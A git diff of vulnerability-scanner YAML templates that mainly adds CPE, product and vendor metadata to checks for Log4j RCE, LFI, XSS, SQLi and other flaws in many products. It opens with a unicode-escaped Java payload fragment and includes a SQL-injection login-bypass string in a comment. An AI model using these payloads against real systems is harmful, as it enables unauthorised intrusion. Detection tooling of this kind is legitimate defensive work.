02c\u0020\u006e\u0065\u0077\u0020\u004f\u0062\u006a\u0065\u0063\u0074\u005b\u005d\u007b\u0072\u0065\u0073\u0075\u006c\u0074\u007d\u0029\u003b\u0072\u0065\u0073\u0070\u002e\u0067\u0065\u0074\u0043\u006c\u0061\u0073\u0073\u0028\u0029\u002e\u0067\u0065\u0074\u004d\u0065\u0074\u0068\u006f\u0064\u0028\u0022\u0064\u006f\u0057\u0072\u0069\u0074\u0065\u0022\u002c\u0020\u006e\u0065\u0077\u0020\u0043\u006c\u0061\u0073\u0073\u005b\u005d\u007b\u0063\u006c\u0073\u007d\u0029\u002e\u0069\u006e\u0076\u006f\u006b\u0065\u0028\u0072\u0065\u0073\u0070\u002c\u0020\u006e\u0065\u0077\u0020\u004f\u0062\u006a\u0065\u0063\u0074\u005b\u005d\u007b\u006f\u0062\u006a\u007d\u0029\u003b\u0020\u007d\u0066\u006c\u0061\u0067\u0020\u003d\u0020\u0074\u0072\u0075\u0065\u003b\u0020\u007d\u0069\u0066\u0020\u0028\u0066\u006c\u0061\u0067\u0029\u0020\u007b\u0020\u0062\u0072\u0065\u0061\u006b\u003b\u0020\u007d\u0020\u007d\u0069\u0066\u0020\u0028\u0066\u006c\u0061\u0067\u0029\u0020\u007b\u0020\u0062\u0072\u0065\u0061\u006b\u003b\u0020\u007d\u0020\u007d\u0020\u0063\u0061\u0074\u0063\u0068\u0020\u0028\u0045\u0078\u0063\u0065\u0070\u0074\u0069\u006f\u006e\u0020\u0065\u0029\u0020\u007b\u0020\u0063\u006f\u006e\u0074\u0069\u006e\u0075\u0065\u003b\u0020\u007d\u0020\u007d' diff --git a/http/vulnerabilities/landray/landray-oa-treexml-rce.yaml b/http/vulnerabilities/landray/landray-oa-treexml-rce.yaml index 2523c8afde..18c956350c 100755 --- a/http/vulnerabilities/landray/landray-oa-treexml-rce.yaml +++ b/http/vulnerabilities/landray/landray-oa-treexml-rce.yaml @@ -13,8 +13,12 @@ info: verified: true max-request: 1 fofa-query: app="Landray-OA系统" + product: landray_office_automation + vendor: landray tags: landray,oa,treexml,rce + classification: + cpe: cpe:2.3:a:landray:landray_office_automation:*:*:*:*:*:*:*:* http: - raw: - | diff --git a/http/vulnerabilities/magento/magento-2-exposed-api.yaml b/http/vulnerabilities/magento/magento-2-exposed-api.yaml index 6895f1f6dc..75580995df 100644 --- a/http/vulnerabilities/magento/magento-2-exposed-api.yaml +++ b/http/vulnerabilities/magento/magento-2-exposed-api.yaml @@ -10,8 +10,12 @@ info: metadata: max-request: 3 shodan-query: http.component:"Magento" + product: magento + vendor: magento tags: magento + classification: + cpe: cpe:2.3:a:magento:magento:*:*:*:*:*:*:*:* http: - method: GET path: diff --git a/http/vulnerabilities/magento/magento-cacheleak.yaml b/http/vulnerabilities/magento/magento-cacheleak.yaml index 934c3cd349..d7db864938 100644 --- a/http/vulnerabilities/magento/magento-cacheleak.yaml +++ b/http/vulnerabilities/magento/magento-cacheleak.yaml @@ -13,8 +13,12 @@ info: verified: true max-request: 1 shodan-query: http.component:"Magento" + product: magento + vendor: magento tags: magento + classification: + cpe: cpe:2.3:a:magento:magento:*:*:*:*:*:*:*:* http: - method: GET path: diff --git a/http/vulnerabilities/magento/magento-unprotected-dev-files.yaml b/http/vulnerabilities/magento/magento-unprotected-dev-files.yaml index ce33597f4e..8ad4a0a339 100644 --- a/http/vulnerabilities/magento/magento-unprotected-dev-files.yaml +++ b/http/vulnerabilities/magento/magento-unprotected-dev-files.yaml @@ -11,8 +11,12 @@ info: verified: true max-request: 2 shodan-query: http.component:"Magento" + product: magento + vendor: magento tags: magento + classification: + cpe: cpe:2.3:a:magento:magento:*:*:*:*:*:*:*:* http: - method: GET path: diff --git a/http/vulnerabilities/microsoft/office-webapps-ssrf.yaml b/http/vulnerabilities/microsoft/office-webapps-ssrf.yaml index fa7f46bed7..03583ba456 100644 --- a/http/vulnerabilities/microsoft/office-webapps-ssrf.yaml +++ b/http/vulnerabilities/microsoft/office-webapps-ssrf.yaml @@ -12,7 +12,11 @@ info: max-request: 1 shodan-query: html:"Provide a link that opens Word" fofa-query: body="Provide a link that opens Word" + product: office_web_apps_server + vendor: microsoft tags: microsoft,office-webapps,redirect + classification: + cpe: cpe:2.3:a:microsoft:office_web_apps_server:*:*:*:*:*:*:*:* variables: oast: "{{interactsh-url}}" string: "{{to_lower(rand_text_alpha(4))}}" @@ -30,4 +34,4 @@ http: - contains(body,'

Interactsh Server

') - status_code == 200 condition: and -# digest: 4a0a00473045022100cbf861ff659932311fdb82c1a1d21e84d62817b2c805bc12eaacfdc5501c384a022061b6723822f822862e2d6b48259339781dcca9bd883f6502676870b3a14a1f26:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100cbf861ff659932311fdb82c1a1d21e84d62817b2c805bc12eaacfdc5501c384a022061b6723822f822862e2d6b48259339781dcca9bd883f6502676870b3a14a1f26:922c64590222798bb761d5b6d8e72950 diff --git a/http/vulnerabilities/mobileiron/mobileiron-log4j-jndi-rce.yaml b/http/vulnerabilities/mobileiron/mobileiron-log4j-jndi-rce.yaml index 18f22abfdc..988fc5b8c7 100644 --- a/http/vulnerabilities/mobileiron/mobileiron-log4j-jndi-rce.yaml +++ b/http/vulnerabilities/mobileiron/mobileiron-log4j-jndi-rce.yaml @@ -17,10 +17,13 @@ info: cvss-score: 10 cve-id: CVE-2021-44228 cwe-id: CWE-917 + cpe: cpe:2.3:a:ivanti:mobileiron:*:*:*:*:*:*:*:* metadata: verified: true max-request: 1 shodan-query: http.html:"MobileIron" + product: mobileiron + vendor: ivanti tags: jndi,log4j,rce,cve,cve2021,ivanti,oast,mobileiron,kev variables: rand1: '{{rand_int(111, 999)}}' diff --git a/http/vulnerabilities/nuxt/nuxt-js-semi-lfi.yaml b/http/vulnerabilities/nuxt/nuxt-js-semi-lfi.yaml index e1f861a16e..d61b12a21a 100644 --- a/http/vulnerabilities/nuxt/nuxt-js-semi-lfi.yaml +++ b/http/vulnerabilities/nuxt/nuxt-js-semi-lfi.yaml @@ -14,8 +14,12 @@ info: max-request: 2 shodan-query: html:"buildAssetsDir" "nuxt" fofa-query: body="buildAssetsDir" && body="__nuxt" + product: framework + vendor: nuxt tags: huntr,lfi,nuxtjs + classification: + cpe: cpe:2.3:a:nuxt:framework:*:*:*:*:*:*:*:* http: - method: GET path: @@ -36,4 +40,4 @@ http: part: header words: - "application/json" -# digest: 490a004630440220322f35c351e585a2931f7260360dc6a47a88a9465c1b0dd3e31f91d8795661c9022010ea1638af2831b4b8910823cef2e0f2c39df4d6b52d0cf2a2cc79a06d9ff2cd:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a004630440220322f35c351e585a2931f7260360dc6a47a88a9465c1b0dd3e31f91d8795661c9022010ea1638af2831b4b8910823cef2e0f2c39df4d6b52d0cf2a2cc79a06d9ff2cd:922c64590222798bb761d5b6d8e72950 diff --git a/http/vulnerabilities/other/3cx-management-console.yaml b/http/vulnerabilities/other/3cx-management-console.yaml index af3d134444..b39a3a4d77 100644 --- a/http/vulnerabilities/other/3cx-management-console.yaml +++ b/http/vulnerabilities/other/3cx-management-console.yaml @@ -11,9 +11,12 @@ info: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N cvss-score: 7.5 cwe-id: CWE-22 + cpe: cpe:2.3:a:3cx:3cx:*:*:*:*:*:*:*:* metadata: max-request: 2 shodan-query: http.title:"3CX Phone System Management Console" + product: 3cx + vendor: 3cx tags: 3cx,lfi,voip http: diff --git a/http/vulnerabilities/other/acti-video-lfi.yaml b/http/vulnerabilities/other/acti-video-lfi.yaml index e5dcc8dca8..b5ad8f5266 100644 --- a/http/vulnerabilities/other/acti-video-lfi.yaml +++ b/http/vulnerabilities/other/acti-video-lfi.yaml @@ -13,8 +13,12 @@ info: max-request: 1 shodan-query: title:"Web Configurator" fofa-query: app="ACTi-视频监控" + product: camera_firmware + vendor: acti tags: acti,lfi,iot,video,monitoring + classification: + cpe: cpe:2.3:o:acti:camera_firmware:*:*:*:*:*:*:*:* http: - method: GET path: diff --git a/http/vulnerabilities/other/apache-druid-log4j.yaml b/http/vulnerabilities/other/apache-druid-log4j.yaml index a3d3d1fa20..1889d313aa 100644 --- a/http/vulnerabilities/other/apache-druid-log4j.yaml +++ b/http/vulnerabilities/other/apache-druid-log4j.yaml @@ -10,10 +10,13 @@ info: cvss-score: 10 cve-id: CVE-2021-44228 cwe-id: CWE-502 + cpe: cpe:2.3:a:apache:druid:*:*:*:*:*:*:*:* metadata: verified: true max-request: 1 shodan-query: title:"Apache Druid" + product: druid + vendor: apache tags: cve,cve2021,rce,jndi,log4j,apache,druid,oast http: @@ -36,4 +39,4 @@ http: - type: status status: - 404 -# digest: 490a00463044022030f1852a5d57ce940ce4fdb486ca500f0e80230abd9ef378a7fe2339e3a96812022023a04db5bf7848f414e848dfe20c4fc02efdb87b209cdf81956d9adad83e317b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a00463044022030f1852a5d57ce940ce4fdb486ca500f0e80230abd9ef378a7fe2339e3a96812022023a04db5bf7848f414e848dfe20c4fc02efdb87b209cdf81956d9adad83e317b:922c64590222798bb761d5b6d8e72950 diff --git a/http/vulnerabilities/other/bagisto-csti.yaml b/http/vulnerabilities/other/bagisto-csti.yaml index 565f3a5035..f4a3244a39 100644 --- a/http/vulnerabilities/other/bagisto-csti.yaml +++ b/http/vulnerabilities/other/bagisto-csti.yaml @@ -12,8 +12,12 @@ info: metadata: fofa-query: "Bagisto" max-request: 1 + product: bagisto + vendor: webkul tags: bagisto,csti,packetstorm,ssti + classification: + cpe: cpe:2.3:a:webkul:bagisto:*:*:*:*:*:*:*:* http: - method: GET path: @@ -32,4 +36,4 @@ http: part: content_type words: - "text/html" -# digest: 490a00463044022015e3c2098a364345bf81fc3d793a002922c4e4a93bdaf0484a0abe3157b18ece02203d187b4fa114b97d147058f5bef877743db96ec4b5ca55cfa900f793f9219ec6:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a00463044022015e3c2098a364345bf81fc3d793a002922c4e4a93bdaf0484a0abe3157b18ece02203d187b4fa114b97d147058f5bef877743db96ec4b5ca55cfa900f793f9219ec6:922c64590222798bb761d5b6d8e72950 diff --git a/http/vulnerabilities/other/beyond-trust-xss.yaml b/http/vulnerabilities/other/beyond-trust-xss.yaml index 06bb84947f..102b33b812 100644 --- a/http/vulnerabilities/other/beyond-trust-xss.yaml +++ b/http/vulnerabilities/other/beyond-trust-xss.yaml @@ -13,8 +13,12 @@ info: max-request: 1 shodan-query: html:"BeyondTrust" google-query: intext:"BeyondTrust" "Redistribution Prohibited" + product: remote_support + vendor: beyondtrust tags: beyondtrust,xss,intrusive + classification: + cpe: cpe:2.3:a:beyondtrust:remote_support:*:*:*:*:*:*:*:* http: - method: GET path: diff --git a/http/vulnerabilities/other/carrental-xss.yaml b/http/vulnerabilities/other/carrental-xss.yaml index abbffe8fb3..fe2d4d0682 100644 --- a/http/vulnerabilities/other/carrental-xss.yaml +++ b/http/vulnerabilities/other/carrental-xss.yaml @@ -13,10 +13,13 @@ info: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N cvss-score: 5.4 cwe-id: CWE-80 + cpe: cpe:2.3:a:car_rental_management_system_project:car_rental_management_system:*:*:*:*:*:*:*:* metadata: verified: true max-request: 3 shodan-query: http.html:"Car Rental Management System" + product: car_rental_management_system + vendor: car_rental_management_system_project tags: xss,cms,authenticated,edb,intrusive http: diff --git a/http/vulnerabilities/other/citrix-xenapp-log4j-rce.yaml b/http/vulnerabilities/other/citrix-xenapp-log4j-rce.yaml index 20e195261c..93ab571ff8 100644 --- a/http/vulnerabilities/other/citrix-xenapp-log4j-rce.yaml +++ b/http/vulnerabilities/other/citrix-xenapp-log4j-rce.yaml @@ -13,9 +13,12 @@ info: cvss-score: 10 cve-id: CVE-2021-44228 cwe-id: CWE-77 + cpe: cpe:2.3:a:citrix:xenapp:*:*:*:*:*:*:*:* metadata: max-request: 1 shodan-query: html:"/citrix/xenapp" + product: xenapp + vendor: citrix tags: cve,cve2021,rce,jndi,log4j,citrix,oast,kev variables: rand1: '{{rand_int(111, 999)}}' diff --git a/http/vulnerabilities/other/ckan-dom-based-xss.yaml b/http/vulnerabilities/other/ckan-dom-based-xss.yaml index 499759d38e..2296b143b6 100644 --- a/http/vulnerabilities/other/ckan-dom-based-xss.yaml +++ b/http/vulnerabilities/other/ckan-dom-based-xss.yaml @@ -12,10 +12,13 @@ info: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:N cvss-score: 7.2 cwe-id: CWE-79 + cpe: cpe:2.3:a:okfn:ckan:*:*:*:*:*:*:*:* metadata: verified: true max-request: 1 shodan-query: html:"ckan 2.8.2" || html:"ckan 2.3" + product: ckan + vendor: okfn tags: dom,xss http: diff --git a/http/vulnerabilities/other/cmseasy-crossall-act-sqli.yaml b/http/vulnerabilities/other/cmseasy-crossall-act-sqli.yaml index 00baccec24..2f7ab9348c 100755 --- a/http/vulnerabilities/other/cmseasy-crossall-act-sqli.yaml +++ b/http/vulnerabilities/other/cmseasy-crossall-act-sqli.yaml @@ -13,8 +13,12 @@ info: verified: true max-request: 1 fofa-query: app="CmsEasy" + product: cmseasy + vendor: cmseasy tags: cmseasy,sqli + classification: + cpe: cpe:2.3:a:cmseasy:cmseasy:*:*:*:*:*:*:*:* http: - method: GET path: diff --git a/http/vulnerabilities/other/coldfusion-debug-xss.yaml b/http/vulnerabilities/other/coldfusion-debug-xss.yaml index ace795546b..e530ebc8e7 100644 --- a/http/vulnerabilities/other/coldfusion-debug-xss.yaml +++ b/http/vulnerabilities/other/coldfusion-debug-xss.yaml @@ -11,9 +11,12 @@ info: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:N cvss-score: 7.2 cwe-id: CWE-79 + cpe: cpe:2.3:a:adobe:coldfusion:*:*:*:*:*:*:*:* metadata: max-request: 2 shodan-query: http.component:"Adobe ColdFusion" + product: coldfusion + vendor: adobe tags: adobe,coldfusion,xss http: diff --git a/http/vulnerabilities/other/dixell-xweb500-filewrite.yaml b/http/vulnerabilities/other/dixell-xweb500-filewrite.yaml index 72e3d7133c..247d7a1df0 100644 --- a/http/vulnerabilities/other/dixell-xweb500-filewrite.yaml +++ b/http/vulnerabilities/other/dixell-xweb500-filewrite.yaml @@ -11,8 +11,12 @@ info: metadata: max-request: 2 google-query: inurl:"xweb500.cgi" + product: dixell_xweb-500 + vendor: emerson tags: lfw,iot,dixell,xweb500,edb,fileupload,intrusive + classification: + cpe: cpe:2.3:h:emerson:dixell_xweb-500:*:*:*:*:*:*:*:* http: - raw: - | @@ -35,4 +39,4 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022010e4a776681e6e34f930a04c95521eb3982e4accdc9027c58ab8459667f9a83d022100871a7712d9cb5ad42ab459ec1a05bc81afa0b87d0758b76960016461cd31cdb8:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022010e4a776681e6e34f930a04c95521eb3982e4accdc9027c58ab8459667f9a83d022100871a7712d9cb5ad42ab459ec1a05bc81afa0b87d0758b76960016461cd31cdb8:922c64590222798bb761d5b6d8e72950 diff --git a/http/vulnerabilities/other/doorgets-info-disclosure.yaml b/http/vulnerabilities/other/doorgets-info-disclosure.yaml index 9b503c2420..d6f5ee7f22 100644 --- a/http/vulnerabilities/other/doorgets-info-disclosure.yaml +++ b/http/vulnerabilities/other/doorgets-info-disclosure.yaml @@ -13,8 +13,12 @@ info: verified: true max-request: 1 google-query: "Powered with doorGets ™" + product: doorgets + vendor: doorgets tags: doorgets,cms,packetstorm,disclosure + classification: + cpe: cpe:2.3:a:doorgets:doorgets:*:*:*:*:*:*:*:* http: - method: GET path: @@ -37,4 +41,4 @@ http: - type: status status: - 200 -# digest: 4a0a0047304502206788d55acc068a11913282587ec6d6f26f3f651173d8d4e24337be109279d687022100bc7d7cefbb3e21f172d7f7d8a525a8bb1231c61532ad0d7d849ae542d0692f46:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502206788d55acc068a11913282587ec6d6f26f3f651173d8d4e24337be109279d687022100bc7d7cefbb3e21f172d7f7d8a525a8bb1231c61532ad0d7d849ae542d0692f46:922c64590222798bb761d5b6d8e72950 diff --git a/http/vulnerabilities/other/dzzoffice-xss.yaml b/http/vulnerabilities/other/dzzoffice-xss.yaml index 34a6b980ad..4a231e7f9f 100644 --- a/http/vulnerabilities/other/dzzoffice-xss.yaml +++ b/http/vulnerabilities/other/dzzoffice-xss.yaml @@ -12,10 +12,13 @@ info: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:N cvss-score: 7.2 cwe-id: CWE-79 + cpe: cpe:2.3:a:dzzoffice:dzzoffice:*:*:*:*:*:*:*:* metadata: verified: true max-request: 1 shodan-query: http.html:"dzzoffice" + product: dzzoffice + vendor: dzzoffice tags: dzzoffice,xss http: diff --git a/http/vulnerabilities/other/ecology-oa-file-sqli.yaml b/http/vulnerabilities/other/ecology-oa-file-sqli.yaml index 663a02fd95..9849c0cb04 100644 --- a/http/vulnerabilities/other/ecology-oa-file-sqli.yaml +++ b/http/vulnerabilities/other/ecology-oa-file-sqli.yaml @@ -13,8 +13,12 @@ info: max-request: 2 shodan-query: ecology_JSessionid fofa-query: app="泛微-协同办公OA" + product: e-cology + vendor: weaver tags: ecology,ecology-oa,sqli + classification: + cpe: cpe:2.3:a:weaver:e-cology:*:*:*:*:*:*:*:* http: - raw: - | diff --git a/http/vulnerabilities/other/ecshop-sqli.yaml b/http/vulnerabilities/other/ecshop-sqli.yaml index 246c0301f6..6f897284f8 100644 --- a/http/vulnerabilities/other/ecshop-sqli.yaml +++ b/http/vulnerabilities/other/ecshop-sqli.yaml @@ -15,10 +15,13 @@ info: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H cvss-score: 10 cwe-id: CWE-89 + cpe: cpe:2.3:a:shopex:ecshop:*:*:*:*:*:*:*:* metadata: verified: true max-request: 2 fofa-query: app="ECShop" + product: ecshop + vendor: shopex tags: sqli,php,ecshop http: @@ -43,4 +46,4 @@ http: - '[0] => Array' - 'MySQL server error report:Array' condition: and -# digest: 4a0a0047304502203ae49378f799b9273219736013b01e956378963294f2c290ca0d9d8f96bfb99f022100d1b025e172f2914639fd88715d7690b6537b8255540d0155162f31e0597eb1df:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502203ae49378f799b9273219736013b01e956378963294f2c290ca0d9d8f96bfb99f022100d1b025e172f2914639fd88715d7690b6537b8255540d0155162f31e0597eb1df:922c64590222798bb761d5b6d8e72950 diff --git a/http/vulnerabilities/other/elFinder-path-traversal.yaml b/http/vulnerabilities/other/elFinder-path-traversal.yaml index 7a5d994a5c..d8bba33c6f 100644 --- a/http/vulnerabilities/other/elFinder-path-traversal.yaml +++ b/http/vulnerabilities/other/elFinder-path-traversal.yaml @@ -12,10 +12,13 @@ info: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N cvss-score: 7.5 cwe-id: CWE-22 + cpe: cpe:2.3:a:std42:elfinder:*:*:*:*:*:*:*:* metadata: verified: true max-request: 1 shodan-query: title:"elfinder" + product: elfinder + vendor: std42 tags: lfi,elfinder http: diff --git a/http/vulnerabilities/other/elasticsearch5-log4j-rce.yaml b/http/vulnerabilities/other/elasticsearch5-log4j-rce.yaml index 6e6a1f949b..887feb07e2 100644 --- a/http/vulnerabilities/other/elasticsearch5-log4j-rce.yaml +++ b/http/vulnerabilities/other/elasticsearch5-log4j-rce.yaml @@ -15,10 +15,13 @@ info: cvss-score: 10 cve-id: CVE-2021-44228 cwe-id: CWE-77 + cpe: cpe:2.3:a:elastic:elasticsearch:*:*:*:*:*:*:*:* metadata: verified: true max-request: 1 shodan-query: elastic indices + product: elasticsearch + vendor: elastic tags: jndi,log4j,rce,oast,elasticsearch,cve,cve2021,kev variables: rand1: '{{rand_int(111, 999)}}' diff --git a/http/vulnerabilities/other/fastadmin-lfi.yaml b/http/vulnerabilities/other/fastadmin-lfi.yaml index fc193575d1..0da57b2355 100644 --- a/http/vulnerabilities/other/fastadmin-lfi.yaml +++ b/http/vulnerabilities/other/fastadmin-lfi.yaml @@ -12,8 +12,12 @@ info: verified: true max-request: 1 fofa-query: app="FASTADMIN-框架" + product: fastadmin + vendor: fastadmin tags: fastadmin,lfi + classification: + cpe: cpe:2.3:a:fastadmin:fastadmin:*:*:*:*:*:*:*:* http: - method: GET path: @@ -32,4 +36,4 @@ http: - type: status status: - 200 -# digest: 4b0a00483046022100fa5b97dac2270310edd8e5f61e36f45e9fa2a3496faf9cacc0bd330f402ea133022100bb4bbcb15ebabf6569c9c65e1ee8f49d6ab3b381c021c68e2b4aad17b9b8ae26:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100fa5b97dac2270310edd8e5f61e36f45e9fa2a3496faf9cacc0bd330f402ea133022100bb4bbcb15ebabf6569c9c65e1ee8f49d6ab3b381c021c68e2b4aad17b9b8ae26:922c64590222798bb761d5b6d8e72950 diff --git a/http/vulnerabilities/other/flatpress-xss.yaml b/http/vulnerabilities/other/flatpress-xss.yaml index dad4dff51e..deab064b45 100644 --- a/http/vulnerabilities/other/flatpress-xss.yaml +++ b/http/vulnerabilities/other/flatpress-xss.yaml @@ -12,10 +12,13 @@ info: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N cvss-score: 6.1 cwe-id: CWE-79 + cpe: cpe:2.3:a:flatpress:flatpress:*:*:*:*:*:*:*:* metadata: verified: true max-request: 2 shodan-query: http.html:"Flatpress" + product: flatpress + vendor: flatpress tags: flatpress,xss,authenticated,oss,intrusive http: @@ -58,4 +61,4 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022100fa2cc4b041819edc1dc91ef9f266cebb8b68bfc43436b271e4985a9a453d9d3e022034dfdd99412f2ed6b8e769756810f1fd0451658dfed145f36f38f86086c31863:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100fa2cc4b041819edc1dc91ef9f266cebb8b68bfc43436b271e4985a9a453d9d3e022034dfdd99412f2ed6b8e769756810f1fd0451658dfed145f36f38f86086c31863:922c64590222798bb761d5b6d8e72950 diff --git a/http/vulnerabilities/other/flexnet-log4j-rce.yaml b/http/vulnerabilities/other/flexnet-log4j-rce.yaml index 69193dade5..380f3bb9d2 100644 --- a/http/vulnerabilities/other/flexnet-log4j-rce.yaml +++ b/http/vulnerabilities/other/flexnet-log4j-rce.yaml @@ -13,9 +13,12 @@ info: cvss-score: 10 cve-id: CVE-2021-44228 cwe-id: CWE-77 + cpe: cpe:2.3:a:flexera:flexnet_publisher:*:*:*:*:*:*:*:* metadata: max-request: 1 shodan-query: title:"Flexnet" + product: flexnet_publisher + vendor: flexera tags: cve,cve2021,rce,jndi,log4j,flexnet,oast,kev variables: rand1: '{{rand_int(111, 999)}}' diff --git a/http/vulnerabilities/other/flir-ax8-rce.yaml b/http/vulnerabilities/other/flir-ax8-rce.yaml index f3968a5fc4..a4c876e91d 100644 --- a/http/vulnerabilities/other/flir-ax8-rce.yaml +++ b/http/vulnerabilities/other/flir-ax8-rce.yaml @@ -13,7 +13,11 @@ info: verified: true max-request: 2 fofa-query: app="FLIR-FLIR-AX8" + product: flir_ax8_firmware + vendor: flir tags: flir-ax8,rce,exploitdb,iot,sensor,authenticated + classification: + cpe: cpe:2.3:o:flir:flir_ax8_firmware:*:*:*:*:*:*:*:* variables: username: admin password: admin diff --git a/http/vulnerabilities/other/fortiportal-log4j-rce.yaml b/http/vulnerabilities/other/fortiportal-log4j-rce.yaml index 4bde7eff22..97f0bc1211 100644 --- a/http/vulnerabilities/other/fortiportal-log4j-rce.yaml +++ b/http/vulnerabilities/other/fortiportal-log4j-rce.yaml @@ -13,9 +13,12 @@ info: cvss-score: 10 cve-id: CVE-2021-44228 cwe-id: CWE-77 + cpe: cpe:2.3:a:fortinet:fortiportal:*:*:*:*:*:*:*:* metadata: max-request: 1 shodan-query: html:"FortiPortal" + product: fortiportal + vendor: fortinet tags: cve,cve2021,rce,jndi,log4j,fortiportal,oast,kev variables: rand1: '{{rand_int(111, 999)}}' diff --git a/http/vulnerabilities/other/graylog-log4j.yaml b/http/vulnerabilities/other/graylog-log4j.yaml index 52b1e39b42..51208e31de 100644 --- a/http/vulnerabilities/other/graylog-log4j.yaml +++ b/http/vulnerabilities/other/graylog-log4j.yaml @@ -14,10 +14,13 @@ info: cvss-score: 10 cve-id: CVE-2021-44228 cwe-id: CWE-77 + cpe: cpe:2.3:a:graylog:graylog:*:*:*:*:*:*:*:* metadata: verified: true max-request: 1 shodan-query: title:"Graylog Web Interface" + product: graylog + vendor: graylog tags: cve,cve2021,rce,jndi,log4j,graylog,kev,oast variables: rand1: '{{rand_int(111, 999)}}' diff --git a/http/vulnerabilities/other/hospital-management-xss.yaml b/http/vulnerabilities/other/hospital-management-xss.yaml index 1e86e134cf..836d237130 100644 --- a/http/vulnerabilities/other/hospital-management-xss.yaml +++ b/http/vulnerabilities/other/hospital-management-xss.yaml @@ -12,11 +12,14 @@ info: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:N cvss-score: 7.2 cwe-id: CWE-79 + cpe: cpe:2.3:a:phptpoint:hospital_management_system:*:*:*:*:*:*:*:* metadata: verified: true max-request: 2 shodan-query: http.html:"Hospital Management System" comment: Login bypass is also possible using the payload - admin'+or+'1'%3D'1' in username. + product: hospital_management_system + vendor: phptpoint tags: hms,hospital,cms,xss,authenticated http: diff --git a/http/vulnerabilities/other/hospital-management-xss2.yaml b/http/vulnerabilities/other/hospital-management-xss2.yaml index f1e0741e15..ce161879d3 100644 --- a/http/vulnerabilities/other/hospital-management-xss2.yaml +++ b/http/vulnerabilities/other/hospital-management-xss2.yaml @@ -12,11 +12,14 @@ info: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:N cvss-score: 7.2 cwe-id: CWE-79 + cpe: cpe:2.3:a:phptpoint:hospital_management_system:*:*:*:*:*:*:*:* metadata: verified: true max-request: 2 shodan-query: http.html:"Hospital Management System" comment: Login bypass is also possible using the payload - admin'+or+'1'%3D'1' in username. + product: hospital_management_system + vendor: phptpoint tags: hms,hospital,cms,xss,authenticated http: diff --git a/http/vulnerabilities/other/icewarp-open-redirect.yaml b/http/vulnerabilities/other/icewarp-open-redirect.yaml index a84017a71e..2db5417400 100644 --- a/http/vulnerabilities/other/icewarp-open-redirect.yaml +++ b/http/vulnerabilities/other/icewarp-open-redirect.yaml @@ -10,10 +10,13 @@ info: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N cvss-score: 6.1 cwe-id: CWE-601 + cpe: cpe:2.3:a:icewarp:icewarp:*:*:*:*:*:*:*:* metadata: verified: true max-request: 1 shodan-query: title:"icewarp" + product: icewarp + vendor: icewarp tags: icewarp,redirect http: diff --git a/http/vulnerabilities/other/icewarp-webclient-rce.yaml b/http/vulnerabilities/other/icewarp-webclient-rce.yaml index 2d64c2ed2e..4d07b185b3 100644 --- a/http/vulnerabilities/other/icewarp-webclient-rce.yaml +++ b/http/vulnerabilities/other/icewarp-webclient-rce.yaml @@ -10,9 +10,12 @@ info: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H cvss-score: 10 cwe-id: CWE-77 + cpe: cpe:2.3:a:icewarp:icewarp:*:*:*:*:*:*:*:* metadata: max-request: 1 shodan-query: title:"icewarp" + product: icewarp + vendor: icewarp tags: icewarp,rce http: diff --git a/http/vulnerabilities/other/inspur-clusterengine-rce.yaml b/http/vulnerabilities/other/inspur-clusterengine-rce.yaml index 037e06ea3d..01c3b79857 100644 --- a/http/vulnerabilities/other/inspur-clusterengine-rce.yaml +++ b/http/vulnerabilities/other/inspur-clusterengine-rce.yaml @@ -15,9 +15,12 @@ info: cvss-score: 9.8 cve-id: CVE-2020-21224 cwe-id: CWE-88 + cpe: cpe:2.3:a:inspur:clusterengine:*:*:*:*:*:*:*:* metadata: max-request: 1 fofa-query: title="TSCEV4.0" + product: clusterengine + vendor: inspur tags: inspur,clusterengine,rce http: diff --git a/http/vulnerabilities/other/kavita-lfi.yaml b/http/vulnerabilities/other/kavita-lfi.yaml index 7f051c9db0..8d37081fc6 100644 --- a/http/vulnerabilities/other/kavita-lfi.yaml +++ b/http/vulnerabilities/other/kavita-lfi.yaml @@ -12,10 +12,13 @@ info: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N cvss-score: 7.5 cwe-id: CWE-22 + cpe: cpe:2.3:a:kavitareader:kavita:*:*:*:*:*:*:*:* metadata: verified: true max-request: 1 shodan-query: http.html:"kavita" + product: kavita + vendor: kavitareader tags: kavita,lfi,huntr http: diff --git a/http/vulnerabilities/other/kingsoft-vgm-lfi.yaml b/http/vulnerabilities/other/kingsoft-vgm-lfi.yaml index a76d986b40..d9f2fbaaf3 100644 --- a/http/vulnerabilities/other/kingsoft-vgm-lfi.yaml +++ b/http/vulnerabilities/other/kingsoft-vgm-lfi.yaml @@ -13,8 +13,12 @@ info: verified: true max-request: 1 fofa-query: title="金山VGM防毒墙" + product: kingsoft_antivirus + vendor: 